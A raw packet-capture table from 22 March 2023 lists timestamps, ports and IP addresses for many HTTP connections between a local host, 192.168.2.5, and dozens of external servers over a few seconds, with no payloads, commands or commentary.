Mar 22, 2023 05:43:09.466615915 CET	80	49707	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:09.466672897 CET	80	49707	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:09.466757059 CET	49707	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:09.468359947 CET	49707	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:09.500606060 CET	80	49717	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:09.500735998 CET	49717	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:09.511610985 CET	80	49706	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:09.511667967 CET	80	49706	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:09.511706114 CET	49706	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:09.511714935 CET	80	49706	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:09.511750937 CET	49706	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:09.511759996 CET	80	49706	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:09.511774063 CET	49706	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:09.511816978 CET	49706	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:09.511847973 CET	80	49706	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:09.511884928 CET	80	49706	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:09.511909008 CET	49706	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:09.511935949 CET	49706	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:09.527543068 CET	49718	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:09.535959005 CET	49716	80	192.168.2.5	192.241.158.94
Mar 22, 2023 05:43:09.542470932 CET	49719	80	192.168.2.5	99.83.154.118
Mar 22, 2023 05:43:09.562308073 CET	80	49718	82.201.61.230	192.168.2.5
Mar 22, 2023 05:43:09.562448025 CET	49718	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:09.565646887 CET	80	49719	99.83.154.118	192.168.2.5
Mar 22, 2023 05:43:09.565762043 CET	49719	80	192.168.2.5	99.83.154.118
Mar 22, 2023 05:43:09.578334093 CET	49717	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:09.619467020 CET	80	49712	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:09.619524002 CET	80	49712	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:09.619555950 CET	80	49712	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:09.619592905 CET	80	49712	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:09.619637966 CET	49712	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:09.619637966 CET	49712	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:09.619704962 CET	49712	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:09.639298916 CET	80	49716	192.241.158.94	192.168.2.5
Mar 22, 2023 05:43:09.639389992 CET	49716	80	192.168.2.5	192.241.158.94
Mar 22, 2023 05:43:09.659570932 CET	49712	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:09.659981012 CET	49719	80	192.168.2.5	99.83.154.118
Mar 22, 2023 05:43:09.683453083 CET	80	49719	99.83.154.118	192.168.2.5
Mar 22, 2023 05:43:09.685187101 CET	80	49719	99.83.154.118	192.168.2.5
Mar 22, 2023 05:43:09.688409090 CET	49719	80	192.168.2.5	99.83.154.118
Mar 22, 2023 05:43:09.727849960 CET	80	49717	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:09.727897882 CET	80	49717	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:09.728054047 CET	49717	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:09.728054047 CET	49717	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:09.775959015 CET	49717	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:09.895946026 CET	49720	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:09.925385952 CET	80	49717	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:09.930440903 CET	80	49712	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:10.045717001 CET	80	49720	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:10.048433065 CET	49720	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:10.078457117 CET	49720	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:10.124778986 CET	49721	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:10.132375956 CET	49722	80	192.168.2.5	172.67.152.159
Mar 22, 2023 05:43:10.134663105 CET	49723	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:10.138381004 CET	49724	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:10.148895025 CET	49725	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:10.149164915 CET	80	49721	80.74.154.6	192.168.2.5
Mar 22, 2023 05:43:10.149244070 CET	49721	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:10.153446913 CET	80	49722	172.67.152.159	192.168.2.5
Mar 22, 2023 05:43:10.153595924 CET	49722	80	192.168.2.5	172.67.152.159
Mar 22, 2023 05:43:10.155529022 CET	49721	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:10.155580044 CET	49722	80	192.168.2.5	172.67.152.159
Mar 22, 2023 05:43:10.158356905 CET	80	49723	192.124.249.10	192.168.2.5
Mar 22, 2023 05:43:10.158489943 CET	49723	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:10.158941031 CET	49723	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:10.176709890 CET	80	49722	172.67.152.159	192.168.2.5
Mar 22, 2023 05:43:10.179625034 CET	80	49724	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:10.179797888 CET	49724	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:10.179863930 CET	80	49721	80.74.154.6	192.168.2.5
Mar 22, 2023 05:43:10.179881096 CET	80	49721	80.74.154.6	192.168.2.5
Mar 22, 2023 05:43:10.179987907 CET	49721	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:10.182475090 CET	80	49723	192.124.249.10	192.168.2.5
Mar 22, 2023 05:43:10.182980061 CET	80	49723	192.124.249.10	192.168.2.5
Mar 22, 2023 05:43:10.184716940 CET	49723	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:10.191546917 CET	80	49725	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:10.192483902 CET	49725	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:10.227454901 CET	80	49720	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:10.227493048 CET	80	49720	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:10.227579117 CET	49720	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:10.244112015 CET	80	49722	172.67.152.159	192.168.2.5
Mar 22, 2023 05:43:10.244139910 CET	80	49722	172.67.152.159	192.168.2.5
Mar 22, 2023 05:43:10.244157076 CET	80	49722	172.67.152.159	192.168.2.5
Mar 22, 2023 05:43:10.244204044 CET	49722	80	192.168.2.5	172.67.152.159
Mar 22, 2023 05:43:10.244275093 CET	49722	80	192.168.2.5	172.67.152.159
Mar 22, 2023 05:43:10.244275093 CET	49722	80	192.168.2.5	172.67.152.159
Mar 22, 2023 05:43:10.317217112 CET	49720	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:10.396538019 CET	49724	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:10.396612883 CET	49725	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:10.439151049 CET	80	49724	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:10.440140009 CET	80	49725	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:10.440459967 CET	80	49725	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:10.441102982 CET	49725	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:10.447525024 CET	80	49724	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:10.449269056 CET	49724	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:10.466202974 CET	80	49720	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:10.538157940 CET	49723	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:10.538314104 CET	49721	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:10.562844038 CET	80	49723	192.124.249.10	192.168.2.5
Mar 22, 2023 05:43:10.562992096 CET	80	49721	80.74.154.6	192.168.2.5
Mar 22, 2023 05:43:10.563118935 CET	49721	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:10.563119888 CET	49723	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:10.563143969 CET	80	49718	82.201.61.230	192.168.2.5
Mar 22, 2023 05:43:10.563467026 CET	49718	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:10.702325106 CET	49725	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:10.702723980 CET	49724	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:10.745392084 CET	80	49725	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:10.745507956 CET	49725	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:10.754143000 CET	80	49724	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:10.754246950 CET	49724	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:10.887540102 CET	49726	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:10.924499989 CET	80	49726	89.161.163.246	192.168.2.5
Mar 22, 2023 05:43:10.924606085 CET	49726	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:10.945319891 CET	49726	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:10.982929945 CET	80	49726	89.161.163.246	192.168.2.5
Mar 22, 2023 05:43:10.982978106 CET	80	49726	89.161.163.246	192.168.2.5
Mar 22, 2023 05:43:10.983012915 CET	80	49726	89.161.163.246	192.168.2.5
Mar 22, 2023 05:43:10.983052969 CET	49726	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:10.983091116 CET	49726	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:11.037642956 CET	49700	80	192.168.2.5	137.118.26.67
Mar 22, 2023 05:43:11.090580940 CET	49727	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:11.091367960 CET	49728	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:11.091530085 CET	49729	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:11.092025042 CET	49730	80	192.168.2.5	172.67.173.200
Mar 22, 2023 05:43:11.113518953 CET	80	49730	172.67.173.200	192.168.2.5
Mar 22, 2023 05:43:11.113626003 CET	49730	80	192.168.2.5	172.67.173.200
Mar 22, 2023 05:43:11.114027977 CET	49730	80	192.168.2.5	172.67.173.200
Mar 22, 2023 05:43:11.115741014 CET	80	49728	188.165.133.163	192.168.2.5
Mar 22, 2023 05:43:11.115840912 CET	49728	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:11.116601944 CET	49728	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:11.123275995 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.126254082 CET	80	49727	185.80.51.179	192.168.2.5
Mar 22, 2023 05:43:11.126374960 CET	49727	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:11.126683950 CET	49727	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:11.136537075 CET	80	49730	172.67.173.200	192.168.2.5
Mar 22, 2023 05:43:11.141675949 CET	80	49728	188.165.133.163	192.168.2.5
Mar 22, 2023 05:43:11.141706944 CET	80	49728	188.165.133.163	192.168.2.5
Mar 22, 2023 05:43:11.141792059 CET	49728	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:11.144584894 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.146603107 CET	80	49730	172.67.173.200	192.168.2.5
Mar 22, 2023 05:43:11.146728992 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.147947073 CET	49730	80	192.168.2.5	172.67.173.200
Mar 22, 2023 05:43:11.162041903 CET	80	49727	185.80.51.179	192.168.2.5
Mar 22, 2023 05:43:11.162378073 CET	80	49727	185.80.51.179	192.168.2.5
Mar 22, 2023 05:43:11.162477016 CET	49727	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:11.167227983 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.188754082 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.223432064 CET	49727	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:11.224244118 CET	49728	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:11.224461079 CET	49732	80	192.168.2.5	192.252.154.18
Mar 22, 2023 05:43:11.224515915 CET	49733	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:11.248603106 CET	80	49728	188.165.133.163	192.168.2.5
Mar 22, 2023 05:43:11.252541065 CET	49728	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:11.259402037 CET	80	49727	185.80.51.179	192.168.2.5
Mar 22, 2023 05:43:11.259489059 CET	49727	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:11.327476025 CET	80	49732	192.252.154.18	192.168.2.5
Mar 22, 2023 05:43:11.328547955 CET	49732	80	192.168.2.5	192.252.154.18
Mar 22, 2023 05:43:11.378427029 CET	80	49729	202.254.236.40	192.168.2.5
Mar 22, 2023 05:43:11.378741980 CET	49729	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:11.383282900 CET	80	49733	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:11.383382082 CET	49733	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:11.432610989 CET	49732	80	192.168.2.5	192.252.154.18
Mar 22, 2023 05:43:11.535613060 CET	80	49732	192.252.154.18	192.168.2.5
Mar 22, 2023 05:43:11.537724018 CET	80	49732	192.252.154.18	192.168.2.5
Mar 22, 2023 05:43:11.537816048 CET	49732	80	192.168.2.5	192.252.154.18
Mar 22, 2023 05:43:11.538307905 CET	49729	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:11.547957897 CET	49733	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:11.555351973 CET	49734	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:11.706352949 CET	80	49733	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:11.706372023 CET	80	49733	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:11.706489086 CET	49733	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:11.707314968 CET	49735	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:11.708372116 CET	49733	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:11.722008944 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.722034931 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.722054958 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.722074032 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.722086906 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.722094059 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.722112894 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.722131968 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.722150087 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.722168922 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.722187996 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.722207069 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.722213984 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.722213984 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.722213984 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.722223997 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.722259998 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.722259998 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.722373962 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.733659983 CET	49736	80	192.168.2.5	46.242.238.60
Mar 22, 2023 05:43:11.733737946 CET	49737	80	192.168.2.5	193.166.255.171
Mar 22, 2023 05:43:11.738560915 CET	49738	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:11.748753071 CET	49739	80	192.168.2.5	69.163.239.62
Mar 22, 2023 05:43:11.755275011 CET	80	49724	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:11.755414009 CET	49724	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:11.770407915 CET	80	49736	46.242.238.60	192.168.2.5
Mar 22, 2023 05:43:11.770503044 CET	49736	80	192.168.2.5	46.242.238.60
Mar 22, 2023 05:43:11.770874023 CET	49736	80	192.168.2.5	46.242.238.60
Mar 22, 2023 05:43:11.783864975 CET	80	49737	193.166.255.171	192.168.2.5
Mar 22, 2023 05:43:11.783978939 CET	49737	80	192.168.2.5	193.166.255.171
Mar 22, 2023 05:43:11.791958094 CET	49737	80	192.168.2.5	193.166.255.171
Mar 22, 2023 05:43:11.807636023 CET	80	49736	46.242.238.60	192.168.2.5
Mar 22, 2023 05:43:11.809295893 CET	80	49736	46.242.238.60	192.168.2.5
Mar 22, 2023 05:43:11.809386969 CET	49736	80	192.168.2.5	46.242.238.60
Mar 22, 2023 05:43:11.825241089 CET	80	49729	202.254.236.40	192.168.2.5
Mar 22, 2023 05:43:11.826622009 CET	80	49729	202.254.236.40	192.168.2.5
Mar 22, 2023 05:43:11.826683044 CET	49729	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:11.835633993 CET	80	49735	108.167.164.216	192.168.2.5
Mar 22, 2023 05:43:11.835757971 CET	49735	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:11.836014032 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.836034060 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.836173058 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.836216927 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.836313963 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.836313963 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.836505890 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.836525917 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.836545944 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.836811066 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.836811066 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.837316990 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.837336063 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.837399960 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.837399960 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.837444067 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.837579012 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.838644981 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.838742018 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.838749886 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.838776112 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.839150906 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.839150906 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.839276075 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.839312077 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.839332104 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.839642048 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.839642048 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.839642048 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.839890957 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.839910030 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.839930058 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.840445995 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.840446949 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.840446949 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.840639114 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.840658903 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.840677977 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.840699911 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.840699911 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.840729952 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.841172934 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.841195107 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.841212034 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.841303110 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.841303110 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.841303110 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.842261076 CET	80	49737	193.166.255.171	192.168.2.5
Mar 22, 2023 05:43:11.842333078 CET	80	49737	193.166.255.171	192.168.2.5
Mar 22, 2023 05:43:11.849560976 CET	80	49734	60.43.154.138	192.168.2.5
Mar 22, 2023 05:43:11.849664927 CET	49734	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:11.867058992 CET	80	49733	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:11.897202015 CET	80	49738	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:11.897488117 CET	49738	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:11.918021917 CET	80	49739	69.163.239.62	192.168.2.5
Mar 22, 2023 05:43:11.918122053 CET	49739	80	192.168.2.5	69.163.239.62
Mar 22, 2023 05:43:11.942764997 CET	49735	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:11.942802906 CET	49734	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:11.942964077 CET	49729	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:11.943380117 CET	49738	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:11.943711996 CET	49739	80	192.168.2.5	69.163.239.62
Mar 22, 2023 05:43:11.950638056 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.950726986 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.950814962 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.950834990 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.950994015 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.951014042 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.951033115 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.951086998 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.951086998 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.951173067 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.951631069 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.951652050 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.951669931 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.951801062 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.951831102 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.952368975 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.952389002 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.952409029 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.952559948 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.952559948 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.953217030 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.953238010 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.953258038 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.953386068 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.953412056 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.954029083 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.954051018 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.954071045 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.954178095 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.954221964 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.954844952 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.954865932 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.954885960 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.955363035 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.955363035 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.955650091 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.955677986 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.955697060 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.955729961 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.955729961 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.955838919 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.956444025 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.956464052 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.956485033 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.956510067 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.956543922 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.956543922 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.957384109 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.957415104 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.957438946 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.957463980 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.957494020 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.957597971 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.958117962 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.958138943 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.958158016 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.958184004 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.958288908 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.958956003 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.959007025 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.959027052 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.959078074 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.959078074 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.959078074 CET	49731	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:11.959764004 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.959785938 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.959805965 CET	80	49731	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:11.960067987 CET	49731	80	192.168.2.5	172.67.201.26
